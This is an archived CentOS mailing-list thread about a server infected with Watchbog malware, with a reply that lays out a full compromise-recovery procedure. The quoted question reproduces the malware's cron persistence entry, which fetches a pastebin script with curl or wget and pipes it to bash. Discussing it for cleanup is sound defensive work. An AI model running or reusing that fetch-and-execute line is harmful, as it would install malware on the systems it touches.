[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Mon Dec 17 21:31:16 UTC 2018
Valeri Galtsev <galtsev at kicp.uchicago.edu>

On 12/17/18 2:57 PM, Mauricio Tavares wrote:
> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
> <kaushalshriyan at gmail.com> wrote:
>> Hi,
>> Is there a way to find out how the CentOS 7.5 Linux box got infected with
>> malware?
>> Currently i am referring to
>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
>> to carry out the below steps and is done manually.
>> 1)rm -fr /tmp/*timesyncc.service*
>> 2)crontab -e -u apigee
>> delete the cron entry
>> */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
>> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>> 3)ps aux | grep watchbog
>> kill -9 pidof watchbog
>> Any suggestions or recommendations to find out how CentOS 7.5 Linux box got
>> infected with Watchbog Malware. Is there any open source software which can
>        do you have untampered log files?
>> be installed on CentOS 7.5 Linux box to detect and prevent Malware?

Standard compromise recovery procedure since forever is (your local 
policy my have slightly different order about notifications and similar):

1. back up all user data

2. Wipe hard drive or whatever storage system you have (some malware 
potentially can flush itself instead of BIOS, but I haven't seen any of 
really existing actually do that - experts probably will chime in here)

3. Freshly re-install system, update, configure with all security 
precautions in mind, restore users and user data

4. Fresh sshd installation takes care of generation of new server key 
pair, just don't copy and re-use old pair

5. Revoke old SSL certificate(s), and recreate and sign new one(s) - 
with new secret key

6. Notify superiors and all users about compromise; stress that users 
have to change their password and key pair(s) on this machine, and 
should consider compromised their accounts on machines they connected to 
from this machine after compromise happened. As thorough forensics often 
takes longer that two weeks, so you can not tell right away exact date 
of original compromise (not the obvious one you see on the surface now), 
suggest they change passwords (and key pairs) on machines they ever 
connected from compromised one. And make them aware that they should 
apply it as a chain (about account on machines further in the chain of 

To prevent re-occurrence of the above: update, update, update. Never 
install anything that is not coming from the source you trust, anything 
that is not downloaded by yourself from trusted source. Paranoia is in 
sysadmin's job description. Install host based intrusion detection 
system. Do your own research and chose what is suitable your situation.

I hope this helps.


>> Thanks in Advance.
>> Best Regards,
>> Kaushal
>> _______________________________________________
>> CentOS mailing list
>> CentOS at centos.org
>> https://lists.centos.org/mailman/listinfo/centos
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> https://lists.centos.org/mailman/listinfo/centos

Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247